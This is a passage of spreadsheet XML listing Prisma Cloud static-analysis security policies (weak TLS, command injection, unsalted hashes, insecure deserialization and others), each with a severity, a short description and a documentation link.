      <c r="P421" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q421" t="inlineStr"/>
      <c r="R421" t="inlineStr"/>
      <c r="S421" t="inlineStr"/>
      <c r="T421" t="b">
        <v>0</v>
      </c>
      <c r="U421" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V421" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W421" t="inlineStr">
        <is>
          <t>The Apache commons mail client by default does not enable TLS server identity. This allows for an adversary who is in between the application and the target host to intercept potentially sensitive information or transmit malicious data. Enable checking server identity by calling `Email.setSSLCheckServerIdentity(true)</t>
        </is>
      </c>
      <c r="X421" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-129</t>
        </is>
      </c>
      <c r="Y421" t="inlineStr"/>
      <c r="Z421" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA421" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB421" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC421" t="inlineStr">
        <is>
          <t>CKV3_SAST_129</t>
        </is>
      </c>
      <c r="AD421" t="b">
        <v>1</v>
      </c>
      <c r="AE421" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF421" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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1" t="inlineStr">
        <is>
          <t>c17e534d-72c1-4b8f-add9-a99577c98b77</t>
        </is>
      </c>
      <c r="AI421" t="inlineStr"/>
      <c r="AJ421" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK421" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" t="inlineStr"/>
      <c r="B422" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C422" s="2" t="inlineStr"/>
      <c r="D422" t="inlineStr"/>
      <c r="E422" t="inlineStr"/>
      <c r="F422" t="inlineStr"/>
      <c r="G422" t="b">
        <v>1</v>
      </c>
      <c r="H4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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J422" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K422" t="inlineStr">
        <is>
          <t>Weak SSL/TLS protocol used</t>
        </is>
      </c>
      <c r="L422" t="inlineStr"/>
      <c r="M422" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N422" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O422" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P422" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q422" t="inlineStr"/>
      <c r="R422" t="inlineStr"/>
      <c r="S422" t="inlineStr"/>
      <c r="T422" t="b">
        <v>0</v>
      </c>
      <c r="U422" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V422" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W422" t="inlineStr">
        <is>
          <t>The use of insecure TLS protocol versions (i.e. a protocol different from "TLSv1.2", "TLSv1.3", "DTLSv1.2", or "DTLSv1.3") is not recommended. TLS 1.2 should be set as the minimum protocol version.</t>
        </is>
      </c>
      <c r="X422" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-67</t>
        </is>
      </c>
      <c r="Y422" t="inlineStr"/>
      <c r="Z422" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA422" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB422" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC422" t="inlineStr">
        <is>
          <t>CKV3_SAST_67</t>
        </is>
      </c>
      <c r="AD422" t="b">
        <v>1</v>
      </c>
      <c r="AE422" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF422" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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2" t="inlineStr">
        <is>
          <t>b12fa646-0def-4de3-a79a-92a50ccdb03a</t>
        </is>
      </c>
      <c r="AI422" t="inlineStr"/>
      <c r="AJ422" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK422" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" t="inlineStr"/>
      <c r="B423" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C423" s="2" t="inlineStr"/>
      <c r="D423" t="inlineStr"/>
      <c r="E423" t="inlineStr"/>
      <c r="F423" t="inlineStr"/>
      <c r="G423" t="b">
        <v>1</v>
      </c>
      <c r="H4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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J423" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K423" t="inlineStr">
        <is>
          <t>Integrity of the data during transmission is not being verified</t>
        </is>
      </c>
      <c r="L423" t="inlineStr"/>
      <c r="M423" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N423" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O423" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P423" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q423" t="inlineStr"/>
      <c r="R423" t="inlineStr"/>
      <c r="S423" t="inlineStr"/>
      <c r="T423" t="b">
        <v>0</v>
      </c>
      <c r="U423" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V423" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W423" t="inlineStr">
        <is>
          <t>The ciphertext produced is susceptible to alteration by an adversary. This mean that the cipher provides no way to detect that the data has been tampered with. If the ciphertext can be controlled by an attacker, it could be altered without detection.</t>
        </is>
      </c>
      <c r="X423" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-12</t>
        </is>
      </c>
      <c r="Y423" t="inlineStr"/>
      <c r="Z423" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA423" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB423" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC423" t="inlineStr">
        <is>
          <t>CKV3_SAST_12</t>
        </is>
      </c>
      <c r="AD423" t="b">
        <v>1</v>
      </c>
      <c r="AE423" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF423" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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3" t="inlineStr">
        <is>
          <t>7e4f4170-c892-4c88-9897-753bc1a80061</t>
        </is>
      </c>
      <c r="AI423" t="inlineStr"/>
      <c r="AJ423" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK423" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" t="inlineStr"/>
      <c r="B424" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C424" s="2" t="inlineStr"/>
      <c r="D424" t="inlineStr"/>
      <c r="E424" t="inlineStr"/>
      <c r="F424" t="inlineStr"/>
      <c r="G424" t="b">
        <v>1</v>
      </c>
      <c r="H4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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J424" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K424" t="inlineStr">
        <is>
          <t>Hash functions used without an unpredictable salt</t>
        </is>
      </c>
      <c r="L424" t="inlineStr"/>
      <c r="M424" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N424" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O424" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P424" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q424" t="inlineStr"/>
      <c r="R424" t="inlineStr"/>
      <c r="S424" t="inlineStr"/>
      <c r="T424" t="b">
        <v>0</v>
      </c>
      <c r="U424" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V424" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W424" t="inlineStr">
        <is>
          <t>Using hash functions without an unpredictable salt increases the likelihood of finding the hash value using rainbow tables.</t>
        </is>
      </c>
      <c r="X424" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-72</t>
        </is>
      </c>
      <c r="Y424" t="inlineStr"/>
      <c r="Z424" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA424" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB424" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC424" t="inlineStr">
        <is>
          <t>CKV3_SAST_72</t>
        </is>
      </c>
      <c r="AD424" t="b">
        <v>1</v>
      </c>
      <c r="AE424" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF424" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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4" t="inlineStr">
        <is>
          <t>7cc2ce80-3cab-457f-bb62-a52d973ec7ce</t>
        </is>
      </c>
      <c r="AI424" t="inlineStr"/>
      <c r="AJ424" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK424" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" t="inlineStr"/>
      <c r="B425" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C425" s="2" t="inlineStr"/>
      <c r="D425" t="inlineStr"/>
      <c r="E425" t="inlineStr"/>
      <c r="F425" t="inlineStr"/>
      <c r="G425" t="b">
        <v>1</v>
      </c>
      <c r="H4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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J425" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K425" t="inlineStr">
        <is>
          <t>Unsanitized input from data from a remote resource flows into os.system</t>
        </is>
      </c>
      <c r="L425" t="inlineStr"/>
      <c r="M425" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N425" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O425" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P425" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q425" t="inlineStr"/>
      <c r="R425" t="inlineStr"/>
      <c r="S425" t="inlineStr"/>
      <c r="T425" t="b">
        <v>0</v>
      </c>
      <c r="U425" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V425" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W425" t="inlineStr">
        <is>
          <t>Unsanitized input from data from a remote resource flows into os.system, where it is used as a shell command. This may result in a Command Injection vulnerability.</t>
        </is>
      </c>
      <c r="X425" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-48</t>
        </is>
      </c>
      <c r="Y425" t="inlineStr"/>
      <c r="Z425" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA425" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB425" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC425" t="inlineStr">
        <is>
          <t>CKV3_SAST_48</t>
        </is>
      </c>
      <c r="AD425" t="b">
        <v>1</v>
      </c>
      <c r="AE425" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF425" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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5" t="inlineStr">
        <is>
          <t>71112634-bc0b-44f4-a10e-ceda81411b6c</t>
        </is>
      </c>
      <c r="AI425" t="inlineStr"/>
      <c r="AJ425" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK425" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" t="inlineStr"/>
      <c r="B426" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C426" s="2" t="inlineStr"/>
      <c r="D426" t="inlineStr"/>
      <c r="E426" t="inlineStr"/>
      <c r="F426" t="inlineStr"/>
      <c r="G426" t="b">
        <v>1</v>
      </c>
      <c r="H4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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J426" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K426" t="inlineStr">
        <is>
          <t>Improper privilege management</t>
        </is>
      </c>
      <c r="L426" t="inlineStr"/>
      <c r="M426" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N426" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O426" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P426" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q426" t="inlineStr"/>
      <c r="R426" t="inlineStr"/>
      <c r="S426" t="inlineStr"/>
      <c r="T426" t="b">
        <v>0</v>
      </c>
      <c r="U426" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V426" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W426" t="inlineStr">
        <is>
          <t>The application was found to permit the `RuntimePermission` of `createClassLoader`, `ReflectPermission` of `suppressAccessChecks`, or both. By granting the `RuntimePermission` of `createClassLoader`, a compromised application could instantiate their own class loaders and load arbitrary classes.</t>
        </is>
      </c>
      <c r="X426" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-126</t>
        </is>
      </c>
      <c r="Y426" t="inlineStr"/>
      <c r="Z426" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA426" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB426" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC426" t="inlineStr">
        <is>
          <t>CKV3_SAST_126</t>
        </is>
      </c>
      <c r="AD426" t="b">
        <v>1</v>
      </c>
      <c r="AE426" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF426" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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6" t="inlineStr">
        <is>
          <t>bc72351f-6d63-4bce-8952-00b4a21d142b</t>
        </is>
      </c>
      <c r="AI426" t="inlineStr"/>
      <c r="AJ426" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK426" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" t="inlineStr"/>
      <c r="B427" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C427" s="2" t="inlineStr"/>
      <c r="D427" t="inlineStr"/>
      <c r="E427" t="inlineStr"/>
      <c r="F427" t="inlineStr"/>
      <c r="G427" t="b">
        <v>1</v>
      </c>
      <c r="H4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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J427" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K427" t="inlineStr">
        <is>
          <t>Utilizing a class that isn't primitive in Java RMI could lead to a vulnerability associated with insecure deserialization.</t>
        </is>
      </c>
      <c r="L427" t="inlineStr"/>
      <c r="M427" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N427" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O427" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P427" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q427" t="inlineStr"/>
      <c r="R427" t="inlineStr"/>
      <c r="S427" t="inlineStr"/>
      <c r="T427" t="b">
        <v>0</v>
      </c>
      <c r="U427" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V427" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W427" t="inlineStr">
        <is>
          <t>Utilizing a class that isn't primitive in Java RMI could lead to a vulnerability associated with insecure deserialization.</t>
        </is>
      </c>
      <c r="X427" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-125</t>
        </is>
      </c>
      <c r="Y427" t="inlineStr"/>
      <c r="Z427" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA427" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB427" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC427" t="inlineStr">
        <is>
          <t>CKV3_SAST_125</t>
        </is>
      </c>
      <c r="AD427" t="b">
        <v>1</v>
      </c>
      <c r="AE427" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF427" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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7" t="inlineStr">
        <is>
          <t>9c7bd352-b20c-450f-a946-81fe42edd0ee</t>
        </is>
      </c>
      <c r="AI427" t="inlineStr"/>
      <c r="AJ427" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK427" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" t="inlineStr"/>
      <c r="B428" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C428" s="2" t="inlineStr"/>
      <c r="D428" t="inlineStr"/>
      <c r="E428" t="inlineStr"/>
      <c r="F428" t="inlineStr"/>
      <c r="G428" t="b">
        <v>1</v>
      </c>
      <c r="H4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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J428" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K428" t="inlineStr">
        <is>
          <t>Sensitive cookie without 'HttpOnly' flag</t>
        </is>
      </c>
      <c r="L428" t="inlineStr"/>
      <c r="M428" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N428" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O428" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P428" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q428" t="inlineStr"/>
      <c r="R428" t="inlineStr"/>
      <c r="S428" t="inlineStr"/>
      <c r="T428" t="b">
        <v>0</v>
      </c>
      <c r="U428" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V428" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W428" t="inlineStr">
        <is>
          <t>The `HttpOnly` attribute when set to `true` protects the cookie value from being accessed by client side JavaScript such as reading the `document.cookie` values. By enabling this protection, a website that is vulnerable to Cross-Site Scripting (XSS) will be able to block malicious scripts from accessing the cookie value from JavaScript.</t>
        </is>
      </c>
      <c r="X428" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-144</t>
        </is>
      </c>
      <c r="Y428" t="inlineStr"/>
      <c r="Z428" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA428" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB428" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC428" t="inlineStr">
        <is>
          <t>CKV3_SAST_144</t>
        </is>
      </c>
      <c r="AD428" t="b">
        <v>1</v>
      </c>
      <c r="AE428" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF428" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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8" t="inlineStr">
        <is>
          <t>ac4a1353-274f-4add-a0ba-84148a5a0f50</t>
        </is>
      </c>
      <c r="AI428" t="inlineStr"/>
      <c r="AJ428" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK428" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" t="inlineStr"/>
      <c r="B429" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C429" s="2" t="inlineStr"/>
      <c r="D429" t="inlineStr"/>
      <c r="E429" t="inlineStr"/>
      <c r="F429" t="inlineStr"/>
      <c r="G429" t="b">
        <v>1</v>
      </c>
      <c r="H4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29" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J429" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K429" t="inlineStr">
        <is>
          <t>Unsecured Creation of Temporary Files</t>
        </is>
      </c>
      <c r="L429" t="inlineStr"/>
      <c r="M429" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N429" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O429" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P429" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q429" t="inlineStr"/>
      <c r="R429" t="inlineStr"/>
      <c r="S429" t="inlineStr"/>
      <c r="T429" t="b">
        <v>0</v>
      </c>
      <c r="U429" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V429" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W429" t="inlineStr">
        <is>
          <t>This policy identifies instances where Go applications create files in shared system temporary directories (/tmp or /var/tmp) without using the os.CreateTemp function. Creating temporary files in these directories without proper precautions can allow attackers to create symlinks that point to other files, potentially leading to unintended files being created or overwritten. It is recommended to use os.CreateTemp to securely create temporary files.</t>
        </is>
      </c>
      <c r="X429" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-255</t>
        </is>
      </c>
      <c r="Y429" t="inlineStr"/>
      <c r="Z429" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA429" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB429" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC429" t="inlineStr">
        <is>
          <t>CKV3_SAST_255</t>
        </is>
      </c>
      <c r="AD429" t="b">
        <v>1</v>
      </c>
      <c r="AE429" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF429" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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29" t="inlineStr">
        <is>
          <t>0a724c5a-731b-4bc6-9853-4cfb2f7d9e04</t>
        </is>
      </c>
      <c r="AI429" t="inlineStr"/>
      <c r="AJ429" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK429" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" t="inlineStr"/>
      <c r="B430" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C430" s="2" t="inlineStr"/>
      <c r="D430" t="inlineStr"/>
      <c r="E430" t="inlineStr"/>
      <c r="F430" t="inlineStr"/>
      <c r="G430" t="b">
        <v>1</v>
      </c>
      <c r="H4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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J430" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K430" t="inlineStr">
        <is>
          <t>Use of RSA Algorithm without Optimal Asymmetric Encryption Padding (OAEP)</t>
        </is>
      </c>
      <c r="L430" t="inlineStr"/>
      <c r="M430" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N430" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O430" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P430" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q430" t="inlineStr"/>
      <c r="R430" t="inlineStr"/>
      <c r="S430" t="inlineStr"/>
      <c r="T430" t="b">
        <v>0</v>
      </c>
      <c r="U430" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V430" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W430" t="inlineStr">
        <is>
          <t>Ensure that use of RSA Algorithm is not being done without Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.</t>
        </is>
      </c>
      <c r="X430" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-35</t>
        </is>
      </c>
      <c r="Y430" t="inlineStr"/>
      <c r="Z430" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA430" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB430" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC430" t="inlineStr">
        <is>
          <t>CKV3_SAST_35</t>
        </is>
      </c>
      <c r="AD430" t="b">
        <v>1</v>
      </c>
      <c r="AE430" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF430" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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0" t="inlineStr">
        <is>
          <t>e983399a-1509-4c37-81a9-6bff9d0501f7</t>
        </is>
      </c>
      <c r="AI430" t="inlineStr"/>
      <c r="AJ430" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK430" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" t="inlineStr"/>
      <c r="B431" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C431" s="2" t="inlineStr"/>
      <c r="D431" t="inlineStr"/>
      <c r="E431" t="inlineStr"/>
      <c r="F431" t="inlineStr"/>
      <c r="G431" t="b">
        <v>1</v>
      </c>
      <c r="H4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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J431" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K431" t="inlineStr">
        <is>
          <t>User input not protected against NoSQL injection</t>
        </is>
      </c>
      <c r="L431" t="inlineStr"/>
      <c r="M431" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N431" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O431" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P431" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q431" t="inlineStr"/>
      <c r="R431" t="inlineStr"/>
      <c r="S431" t="inlineStr"/>
      <c r="T431" t="b">
        <v>0</v>
      </c>
      <c r="U431" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V431" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W431" t="inlineStr">
        <is>
          <t>Detected an vulnerable when generating NoSQL queries that vulnerable to injection</t>
        </is>
      </c>
      <c r="X431" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-52</t>
        </is>
      </c>
      <c r="Y431" t="inlineStr"/>
